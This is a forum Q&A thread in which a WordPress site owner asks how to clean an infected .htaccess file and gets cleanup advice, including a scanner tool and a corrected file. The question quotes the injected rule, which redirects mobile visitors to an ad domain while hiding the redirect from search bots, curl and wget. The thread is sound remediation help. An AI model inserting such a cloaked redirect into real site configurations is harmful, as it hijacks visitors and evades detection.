Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
N
N
nogames2014-05-23 15:37:38
htaccess
nogames, 2014-05-23 15:37:38

How to remove malicious code from htaccess file?

Yandex.Webmaster reported that I have a malicious code on my site that forwards users of the mobile version somewhere in the wrong direction.
Here is what I found in the htaccess file:
php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (adr|android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser| iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*)pda.whiteads.biz/?29&source=mydomain2.ru [L,R=302] # On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
*Replaced my site address with mydomain.
**mydomain2.ru is a mirror of my main domain, from which, in theory, there should be a forward to the main domain.
There was a similar question here ( toster.ru/q/23715) , and the topic starter was advised to check htaccess for constructs like the one I have.
I am not a programmer, so I do not understand what is needed in this code and what is malicious code. And yes, the last modified date of the file corresponds to the date that one polite and helpful freelancer made me a new feature for the site. Therefore, I am now somehow afraid to give access to the site to strangers.
I hope for collective help. Thanks in advance to everyone who answers!

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

4 answer(s)
Report
1
1001001 111, 2014-05-23
@IgorO2

Give me access, I'll fix it =)))
ps How to protect users of the mobile version of the site/forum from malicious banners/scripts?

Report
A
Alexander Borisovich, 2014-05-23
@Alexufo

Take a normal htaccess from the distribution kit.
Then set the rights to the minimum on this file to 600.
And .... look for the same files in all directories.
And it was also flooded, or doorway - the body of the virus.

Report
I
Illan, 2014-05-24
@Illan

It was discussed here, there is even an example:
For what reason can a virus enter the site (when you enter from a mobile phone)?

Report
V
Viktor Taran, 2018-03-19
@shambler81

1. You leave it like that

php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress

RewriteEngine on
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

2. Download here https://revisium.com/ai/ (for websites)
3. Launch either via ssh php -q ai-bolit.php
or in the browser and wait. Then you look through what he found and delete (thoughtfully)
It is advisable to update the engine (do not even think without a backup), ideally find a vulnerability.

Similar questions
A
Alina Mitrokhina2019-12-09 19:11:41
What problems are present in this code and how to improve it? 2Reply
C
CapitanFreeloader2016-09-22 17:28:51
How to convert RewriteRule ^page/ page.php [L] to regular expressions? 0Reply
V
vinznsk2019-02-22 11:15:31
How to set redirect exception in .htaccess? 1Reply
G
Greg Plitt2020-11-20 14:08:52
How to change URL from \ to / everywhere? 1Reply
S
Sergey Goryachev2017-07-27 17:55:27
The easiest file manager for a website? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question